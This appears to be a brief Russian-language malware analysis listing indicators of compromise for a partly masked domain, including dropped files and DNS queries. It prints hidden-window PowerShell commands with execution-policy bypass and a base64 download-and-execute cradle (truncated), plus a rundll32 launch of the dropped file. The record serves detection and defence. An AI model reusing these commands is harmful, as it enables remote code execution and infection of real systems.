Техническая информация
- http://ma###onte.top/444g100/index.php
- %TEMP%\xmohkb.dat
- 'ma###onte.top':80
- http://ma###onte.top/444g100/main.php
- DNS ASK ma###onte.top
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...
- '<SYSTEM32>\rundll32.exe' %TEMP%\XmOHKb.dat f1